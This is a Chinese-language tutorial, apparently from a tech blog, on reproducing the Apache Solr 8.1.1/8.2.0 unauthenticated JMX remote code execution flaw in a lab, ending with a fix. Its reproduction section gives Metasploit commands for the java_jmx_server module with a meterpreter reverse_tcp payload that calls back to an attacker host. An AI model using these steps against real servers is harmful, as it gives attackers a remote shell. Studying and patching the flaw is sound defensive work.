如何進(jìn)行Apache Solr JMX服務(wù)RCE漏洞復(fù)現(xiàn)

這篇文章將為大家詳細(xì)講解有關(guān)如何進(jìn)行Apache Solr JMX服務(wù)RCE漏洞復(fù)現(xiàn)，文章內(nèi)容質(zhì)量較高，因此小編分享給大家做個(gè)參考，希望大家閱讀完這篇文章后對(duì)相關(guān)知識(shí)有一定的了解。

0x00簡(jiǎn)介

Solr是一個(gè)獨(dú)立的企業(yè)級(jí)搜索應(yīng)用服務(wù)器，它對(duì)外提供類似于Web-service的API接口。用戶可以通過http請(qǐng)求，向搜索引擎服務(wù)器提交一定格式的XML文件，生成索引；也可以通過Http Get操作提出查找請(qǐng)求，并得到XML格式的返回結(jié)果。

該漏洞源于默認(rèn)配置文件solr.in.sh中的ENABLE_REMOTE_JMX_OPTS配置選項(xiàng)存在安全風(fēng)險(xiǎn)。

  Apache Solr的8.1.1和8.2.0版本的自帶配置文件solr.in.sh中存在ENABLE_REMOTE_JMX_OPTS="true"選項(xiàng)。

如果使用受影響版本中的默認(rèn)solr.in.sh文件，那么將啟用JMX監(jiān)視并將其暴露在RMI_PORT上（默認(rèn)值= 18983），

并且無需進(jìn)行任何身份驗(yàn)證。 如果防火墻中的入站流量打開了此端口，則具有Solr節(jié)點(diǎn)網(wǎng)絡(luò)訪問權(quán)限的任何人都將能夠訪問JMX，

  并且可以上傳惡意代碼在Solr服務(wù)器上執(zhí)行。該漏洞不影響Windows系統(tǒng)的用戶,僅影響部分版本的Linux用戶。

0x01影響版本

Apache Solr8.1.1版本上線時(shí)間：2019-05-28

Apache Solr8.2.0版本上線時(shí)間：2019-07-25

0x02漏洞危害

  如果受害者使用了該默認(rèn)配置，則會(huì)在默認(rèn)端口18983開放JMX服務(wù)，且默認(rèn)未開啟認(rèn)證。任何可訪問此端口的攻擊者可利用此漏洞向受影響服務(wù)發(fā)起攻擊，執(zhí)行任意代碼。

0x03環(huán)境搭建

Java環(huán)境和kali系統(tǒng)、Solr 8.20

Solr 8.20 下載地址：

wget http://archive.apache.org/dist/lucene/solr/8.2.0/solr-8.2.0.zip

使用unzip solr-8.2.0.zip解壓

解壓完成后，切換到bin目錄啟動(dòng)Solr

./solr  start  -force

啟動(dòng)后訪問：http://192.168.10.176:8983/

0x04漏洞復(fù)現(xiàn)

攻擊機(jī)：kali IP：192.168.10.147

受害機(jī)：Ubuntu18.6中docker IP：192.168.10.184:8983

1、使用nmap掃描端口后發(fā)現(xiàn)18983端口開啟

2、使用Metasploit中的exploit/multi/misc/java_jmx_server模塊進(jìn)行漏洞復(fù)現(xiàn)

? use exploit/multi/misc/java_jmx_server

? set RHOST 192.168.10.184

? set RPORT 18983

再來設(shè)置payload：java/meterpreter/reverse_tcp

? set payload java/meterpreter/reverse_tcp

? set LHOST 192.168.10.147

? set LPORT  4444

3、使用run執(zhí)行，即可看到成功建立連接

0x05修復(fù)建議

將solr.in.sh配置文件中的ENABLE_REMOTE_JMX_OPTS選項(xiàng)設(shè)置為false，然后重啟Solr服務(wù)。

關(guān)于如何進(jìn)行Apache Solr JMX服務(wù)RCE漏洞復(fù)現(xiàn)就分享到這里了，希望以上內(nèi)容可以對(duì)大家有一定的幫助，可以學(xué)到更多知識(shí)。如果覺得文章不錯(cuò)，可以把它分享出去讓更多的人看到。